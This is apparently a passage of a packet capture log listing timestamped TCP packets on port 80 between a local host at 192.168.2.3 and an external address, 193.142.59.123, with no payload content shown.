Aug 23, 2021 02:08:38.317625046 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.323184967 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.326505899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326535940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326564074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326586962 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326623917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.326644897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326683998 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.326706886 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.326709986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326738119 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326761961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326782942 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326819897 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.326821089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326850891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326864958 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.326916933 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.326920033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326945066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326967955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.326991081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327034950 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327014923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327074051 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327081919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327152967 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327189922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327218056 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327238083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327265978 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327285051 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327306032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327338934 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327346087 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327366114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327384949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327404976 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327416897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327446938 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327449083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327470064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327495098 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327503920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327523947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327543020 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327554941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327574968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327600002 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327605963 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327629089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327647924 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327665091 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327686071 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327708006 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327730894 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327748060 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327769041 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327781916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327802896 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327822924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327847958 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327857971 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327891111 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327892065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327914953 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327939987 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.327948093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327967882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.327991009 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328000069 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328018904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328037024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328063011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328068972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328089952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328108072 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328121901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328145027 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328157902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328180075 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328208923 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328211069 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328234911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328254938 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328274965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328291893 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328311920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328334093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328360081 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328365088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328387022 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328408957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328428984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328444004 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328469992 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328489065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328509092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328536987 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328545094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328571081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328593969 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328622103 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328634024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328654051 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328672886 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328696012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328716993 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328751087 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328758955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328783035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328809977 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328824043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328843117 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328856945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328879118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328901052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328917027 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.328938961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328975916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.328977108 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329001904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329025030 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329036951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329061031 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329088926 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329106092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329164028 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329174995 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329200029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329225063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329245090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329273939 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329317093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329320908 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329349041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329386950 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329411983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329433918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329457045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329457045 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329476118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329495907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329519987 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329530954 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329540968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329564095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329569101 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329587936 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329612970 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329632044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329643011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329652071 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329674006 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329690933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329711914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329732895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329752922 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329758883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329782009 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329792023 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329803944 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329828024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329842091 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329850912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329874039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329900026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329905033 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329921961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329950094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329955101 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.329982996 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.329991102 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330007076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330029011 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330033064 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330050945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330075979 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330096006 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330096960 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330117941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330137968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330142021 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330166101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330177069 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330190897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330212116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330231905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330234051 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330250978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330260992 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330276012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330297947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330300093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330318928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330344915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330358028 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330374956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330399990 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330415964 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330425978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330447912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330468893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330478907 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330492020 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330503941 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.330511093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.330554962 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.332099915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.332128048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.332153082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.332180023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.332206964 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.332210064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.332233906 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.332248926 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.332264900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.332287073 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.332290888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.332319021 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.332334042 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.332375050 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.332386971 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354141951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354176044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354202032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354226112 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354250908 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354259968 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354275942 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354302883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354311943 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354327917 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354348898 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354355097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354379892 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354381084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354415894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354437113 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354440928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354465961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354470015 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354490042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354516029 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354517937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354548931 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354559898 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354577065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354603052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354604006 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354634047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354650974 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.354693890 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354713917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.354737043 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.356017113 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361455917 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361500025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361534119 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361572981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361577988 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361609936 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361639023 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361646891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361675024 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361685038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361716986 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361721992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361761093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361762047 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361788988 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361799955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361828089 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361840010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361881971 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361885071 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361922026 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361927986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361939907 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.361964941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.361994982 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362004995 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362032890 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362046003 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362049103 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362090111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362123013 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362149000 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362159967 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362189054 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362196922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362222910 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362236023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362267971 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362278938 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362288952 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362318039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362351894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362382889 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362390041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362417936 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362428904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362457037 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362466097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362494946 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362504005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362529993 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362540960 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362555027 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362577915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362607002 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362618923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362648964 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362658978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362689018 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362698078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362734079 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362771034 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362795115 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362811089 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362833977 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362876892 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362879038 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362903118 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362916946 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362934113 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.362971067 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.362976074 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363013983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363046885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363089085 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363142967 CEST	80	49735	193.142.59.123	192.168.2.3
